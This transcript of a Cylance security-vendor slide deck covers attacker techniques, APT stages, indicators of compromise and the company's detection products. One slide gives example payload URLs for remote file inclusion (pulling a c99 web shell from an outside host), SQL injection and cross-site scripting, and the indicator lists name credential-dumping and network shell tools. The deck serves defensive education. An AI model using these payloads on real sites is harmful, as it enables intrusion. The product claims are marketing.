Corey White, VP, Professional Services Cylance Mathematical Determination of Good and Bad Leveraging...
-
Upload
meredith-webb -
Category
Documents
-
view
213 -
download
0
Transcript of Corey White, VP, Professional Services Cylance Mathematical Determination of Good and Bad Leveraging...
Corey White, VP, Professional Services
CylanceMathematical Determination ofGood and Bad Leveraging Preventative/ Response Professional Services
PRESPONSE Professional Services
Risk Does Not Equal Threat | Presponse Compromise Assessment
Malware - Windows / Linux / OSX (31% didn’t use malware)
• Dropper/Downloaders – Phishing & Waterholing Malware in Userspace Zero/Single-day Exploits that lead to…
• Backdoor Trojan RATs – Kernel interactive Service Binaries that mimic legitimate capabilities (RAS/Proxy/AV/Recon/Config)
• BOTNETs – Platforms for MAAS/Subscription Access
• WebShells – Internet-facing Server Backdoor RATs (c99/r57/eval)
Hacking - .day Exploits• Zero Day
• Vulnerability that only the developer knows about
• ½ Day• Vulnerability that is known about but no patches are yet available
• Single Day• Vulnerability that is known about and patches are available but not applied
• Forever Day• Vulnerability that is known and cannot be patched
Hacking - Web Server/Services Exploits
• Remote code execution (watch your .htaccess files!)• register_globals on in PHP | require ($page . ".php");
http://www.plshackme.com/index.php?page=http://www.ilikeyoursite.com/c99.txt
• SQL injection (watch your user privileges!)• AND / OR in SQL $query | $query = "SELECT * FROM users WHERE
username = '' or '1=1'";http://www.plshackme.com/site.asp?id=1%20and%201=convert(int,@@version),,
• Cross Site Scripting/XSS (watch your syntax!)• Volatile entry in Echo | <?php echo "<p>Your Name <br />"; echo
($_GET[name_1]); ?> http://www.plshackme.com/clean.php?name_1=<script>HERE_IS_MY_CODE</script>
• Username enumeration (watch your error messages!)• Username guessing | Incorrect logon / password combination
Social Engineering – Access, Behavior, and Authority
Subversion
• Contractors• Employees
Sabotage
• Phishing• Waterholing• USB “HoneyDrops” & Other
Free Hardware• “HelpDesk Operators”• “Visitors” (Repairmen, Janitors,
Pizza/Flower Delivery, Tailgaters)
Advanced Persistent Threat - Activities
Stage 2 - Exploit• Privilege
Escalation• Lateral Movement• User Profile Abuse• Remote Access
Provisioning• Services
Bypass/Cancellation
Stage 1 - Compromise
• Social Engineering Backdoors• Phishing / Waterholing• Help Desk / Visitors
• Web Site Backdoors
• Reconnaissance
Stage 3 - Control• Configuration
Management• Data Targeting• Data Exfiltration• Sabotage• Subversion
Most commonly seen indicators of data loss:
• Non-standard Packagers (7z, Gz, RAR, PKZIP, etc.)
• Multipart Files of particular sizes (250/500Mb)
• “Recycle”/Recycle Bin Residue
• HTTP 206 Status Codes on Web Servers
• Non-standard File Transfer Services (Filezilla, FTP, WsFTP, etc.)
• Non-standard Reverse/Proxy Services (HUCs, PLINK, NC, SSH, etc.)
Most commonly seen indicators of sabotage:
• Unusual Prefetch / Recent / LNK / Bash binary execution history
• AT / CRON Jobs
• Scripts
• Services Cancellation
• User Profile Authority Changes
Most commonly seen indicators of user profile abuse:
• Multiple user accounts on single computer
• User account on multiple computers
• Service & Administrative account propagation
• Extranet LDAP/AD account use
• Account privilege provisioning/modifications (SuSID, MD5, Admins etc.)
• Local Services history (MIMIKATZ, PWDUMP, L0pht, CAIN/ABEL)
Most commonly seen indicators of lateral movement:
• Access history (Type 3 / 4 / 8 / 10 logins, AuthLog)
• MSTSC history (.RDP, .BMC)
• Remote job scheduling (AT, SC, WMIC, SSH)
• Redundant & non-standard RAS tools (VNC, LogMeIn, TeamViewer, NC, PUTTY, PSEXEC, *FTP, SCP)
• Domain Services history (DSGET, DSQUERY, HYENA)
• Reconnaissance tools (FPORT, NET/NET1, NETSH, PING)
Most commonly seen indicators of insider threats:
• Unusual profile access and use history• Time• HostID• Application History• Configuration History
• RBAC violations
• Other Acceptable Use Policy violations
• Malware / PUP / PUM…
Most common malware identifiers:
• Authority – service, administrator, or user
• Persistence – only 4 persistence mechanisms in Windows
• Communications – only 44 netsvcs keys in Windows Services
• Functionality – user and kernel combinations are rare
• File System – user or system
Risk Does Not Equal Threat | Presponse Compromise Assessment
Issues Not Indicators
Focus on Priorities
Get Ahead of Compromise Activities• Monitor
– Persistence settings: registry keys, startup folders, scheduled jobs/tasks
– Service creations
• Alert– User Profile Propagation– Lateral Movement/Access– Anomalous Use (time/resources)– Service State Changes (start/stop)– File creations by type (RAR, BAT, VBS, SH, etc.)– Sinkhole Communications
• Prevent– Assess and Secure Networks & Applications– Automated Tasks– Known PUP/PUMs– User-space Execution
Prevent
Victimization
CANDY DROP
SUPPLY CHAIN
SOCIAL ENGINEERING
WEB
DIRECT OPEN PORTSTCP/135INSIDER
STARVATION
Innovation Requires
WARNING: Deprogramming Required
JUST 100% Pure MATH
NOSignatures
NOHeuristics
NO Behavioral
NOSandboxing
NODynamic
Detonation
NOMicro-
Virtualization
MALICIOUS GOOD
Blacklist
“THE GREYLIST”UNKNOWN
Sandboxing
Servers AV
Antivirus / HIPS
FirewallEmail / WebGateway
IDS/IPS
Whitelisting
100% Pure Math
GAP (60%+)20%
Whitelist
20%
Behavioral Analysis
TrusttheVendorTrust
theMath
JUNE 2013
Infinity
Product Portfolio
• Free, Silent• REST API over SSL• Advanced Threat• Over 5,000 seats
Detection only
OCTOBER 2013
• V-API• V-Forensics• V-Gateway• V-Helpdesk
Detection only
FEBRUARY 2014
• Windows Agent• Cloud management• Silent / small footprint
Detection and Protection
DETECTSWEEP*DETECTSWEEP*
APRIL 2014
• Browser delivery• Detection of threats• Silent / small footprint
Detectionwith Protection option